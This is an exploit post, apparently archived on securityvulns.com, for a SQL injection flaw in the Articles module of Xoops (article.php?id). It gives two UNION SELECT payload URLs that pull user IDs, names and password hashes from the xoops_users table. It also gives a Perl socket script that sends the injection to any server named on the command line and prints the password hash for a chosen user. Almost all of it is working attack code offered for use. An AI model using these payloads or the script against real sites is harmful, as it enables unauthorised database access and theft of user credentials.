SecurityvulnsSECURITYVULNS:DOC:19710Xoops All Version -Articles- Article.PHP (ID) Blind SQL Injection ExpL0it
/Cr@zy_King / http://coderx.org
Xoops All Version -Articles- Article.PHP (ID) Blind SQL Injection ExpL0it
Sql 1-2
article.php?id=3+union+select+1,2,3,4,5,6,AES_DECRYPT(AES_ENCRYPT(USER(),0x71),0x71),8,9,0,1,2,3,4,5,6,7,8,9,0/*
article.php?id=3//UNION//SELECT//NULL,NULL,NULL,NULL,uid,uname,pass,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL//FROM//xoops_users//LIMIT/**/1,1/*
Exploit :
#############################################
#Coded By Cr@zy_King http://coderx.org]#
#############################################
use IO::Socket;
if (@ARGV != 3)
{
print "\n-----------------------------------\n";
print "Xoops All Version -Articles- Article.PHP (ID) Blind SQL Injection ExpL0it\n";
print "-----------------------------------\n";
print "\n4ever Cra\n";
print "crazy_kinq[at]hotmail.co.uk\n";
print "http://coderx.org\n";
print "\n-----------------------------------\n";
print "\nKullanim: $0 <server> <path> <uid>\n";
print "Ornek: $0 www.victim.com /path 1\n";
print "\n-----------------------------------\n";
exit ();
}
$server = $ARGV[0];
$path = $ARGV[1];
$uid = $ARGV[2];
$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server", PeerPort =>
"80");
printf $socket ("GET
%s/modules/articles/article.php?id=3//UNION//SELECT//NULL,NULL,NULL,NULL,NULL,pass,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL//FROM//xoops_users//WHERE/**/uid=$uid/*
HTTP/1.0\nHost: %s\nAccept: /\nConnection:
close\n\n",
$path,$server,$uid);
while(<$socket>)
{
if (/\>(\w{32})\</) { print "\nID '$uid' User Password :\n\n$1\n"; }
}